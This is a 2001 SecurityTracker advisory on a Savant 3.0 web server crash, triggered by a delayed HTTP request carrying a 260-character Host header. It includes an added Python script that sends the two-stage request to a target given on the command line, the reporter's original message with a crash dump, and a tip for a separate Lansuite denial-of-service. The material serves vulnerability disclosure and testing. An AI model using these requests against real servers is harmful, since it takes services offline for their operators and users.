Savant Web Server Can Be Crashed Remotely With Certain HTTP Requests
SecurityTracker Alert ID: 1001248
SecurityTracker URL: http://securitytracker.com/id/1001248
CVE Reference: GENERIC-MAP-NOMATCH
Date: Apr 6 2001
Impact: Denial of service via network
Exploit Included: Yes
Description:
It was reported that the Savant web server (version 3.0, per the source message) contains a vulnerability that allows a remote user to crash the web server process by sending a specially formed HTTP request.
The timing of the request is reported to be significant. If an HTTP request of the following format is sent:
GET / HTTP/1.1
Host:AAAAAAAAAAAAAAAAAAAA.....
(where the Host value is 260 'A' characters), approximately 3 seconds elapse, and a carriage return is then sent to end the request, the server application will reportedly crash. The same request sent without the pause reportedly has no effect. The server application writes no messages to its error log. On Windows 98, the system reports "an invalid page fault in module KERNEL32.DLL."; on Windows NT the process reportedly terminates silently and accepts no further connections.
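The two-stage request described above, as an added reproduction harness that is not part of the SecurityTracker entry or of Savant itself. It builds the request line plus an oversized Host header exactly as the report shows it (no space after "Host:", CRLF line endings as a telnet session would send them), pauses for the reported 3 seconds, then sends the bare CRLF that ends the header block, and finally checks whether the target still accepts TCP connections. The target host, port and timeouts are parameters; the delay and Host length default to the values in the report. Whether the crash actually occurs is not asserted here; the function only records what was observed.

```python
import socket
import time

CRLF = b"\r\n"


def build_stage_one(host_len: int = 260, filler: bytes = b"A") -> bytes:
    """Bytes sent first: the request line and the oversized Host header.

    The advisory shows 'Host:' with no space before the value; that is kept
    as-is. Each line ends in CRLF, which is what 'hit return' produces in a
    telnet session. The header block is deliberately left unterminated so
    the server is still waiting for more headers when the pause begins.
    """
    return b"GET / HTTP/1.1" + CRLF + b"Host:" + filler * host_len + CRLF


def build_stage_two() -> bytes:
    """Bytes sent after the pause: the empty line that ends the header block."""
    return CRLF


def is_listening(host: str, port: int, timeout: float = 2.0) -> bool:
    """Check whether the server still accepts TCP connections.

    The report says a crashed Savant takes no further connections, so this
    is the post-condition a tester would want to record.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def send_timed_request(host: str, port: int = 80, delay: float = 3.0,
                       host_len: int = 260, timeout: float = 5.0) -> dict:
    """Replay the two-stage request against host:port and report what happened.

    Returns a dict with the byte counts sent in each stage, whatever the
    server sent back after the closing CRLF (possibly nothing), and whether
    it still accepts connections afterwards. host/port are assumed to be a
    disposable test target under the tester's control.
    """
    stage_one, stage_two = build_stage_one(host_len), build_stage_two()
    result = {"stage_one_len": len(stage_one), "stage_two_len": len(stage_two),
              "response": b"", "still_listening": None}
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(stage_one)
        time.sleep(delay)          # the pause the report says is required
        sock.sendall(stage_two)
        try:
            result["response"] = sock.recv(4096)
        except OSError:            # timeout or reset: the server may be gone
            pass
    result["still_listening"] = is_listening(host, port)
    return result


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    print(send_timed_request(target, port))
```

Run it as `python savant_timed.py <host> <port>` against a lab instance; a result with an empty `response` and `still_listening` set to `False` matches the behaviour the report describes, while a normal HTTP response with `still_listening` `True` means the server handled the delayed request. The source message notes that a scripted version of the same request did not reproduce the crash for the reporter, so the exact delay and the split between the two sends may need adjusting.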
Impact:
A remote user can cause the server application to crash.
Solution:
No solution was available at the time of this entry.
Vendor URL: savant.sourceforge.com
Cause:
Exception handling error
Underlying OS:
Windows (NT), Windows (95), Windows (98), Windows (2000)
Message History:
None.
Source Message Contents
Date: Thu, 5 Apr 2001 16:13:16 -0000
Subject: Savant 3.0 Denial Of Service
Not exactly sure what the problem is, because it will
handle the same request from a program that does
the same thing.
"Time is a factor", so pay attention man ;P
Connect to the server using telnet or something and
type in the following:
GET / HTTP/1.1
Host:AAAAAAAAAAAAAAAAAAAA.....
where A x 260, hit return, wait 3 seconds, hit return
again and you should see it crash. I tested this locally
and remotely on both Windows 98 and NT-4.
Oh yeah, no error messages are given on NT for
some reason, the program simply terminates, yes,
no more connections, got that? The following was
displayed on Windows 98. If you do not give it the
time, it doesn't work, got that okay?
So don't come saying "I threw so many characters at
it and nothing happened"; do as I say, and it will work.
SAVANT caused an invalid page fault in
module KERNEL32.DLL at 015f:bff87eb5.
Registers:
EAX=c00300f0 CS=015f EIP=bff87eb5
EFLGS=00010212
EBX=011bff88 SS=0167 ESP=010bffec
EBP=010c0058
ECX=10020c01 DS=0167 ESI=8163c414 FS=41af
EDX=bff76859 ES=0167 EDI=010c0238 GS=0000
Bytes at CS:EIP:
53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
Stack dump:
Sending the same request using a Perl script didn't
seem to affect the server at all, which is why I can't
tell what's wrong. But who cares? *shrug*
----------------------------------------------------------------
cut....
BTW Moderator, because you have been told that
maybe the Lansuite DoS against version 1.0.34
doesn't work, can I tell you that it is still effective
against the latest 1.0.35 and is effective locally as well
as remotely on both Windows 98 and NT-4, as I have
tested. I have Dr. Watson logs to prove it.
The trick in the problem is the forward slash before
HTTP/1.1, like %2fHTTP/1.1 - get me sir?
So update your database please, people depend on
it, even the developers!!!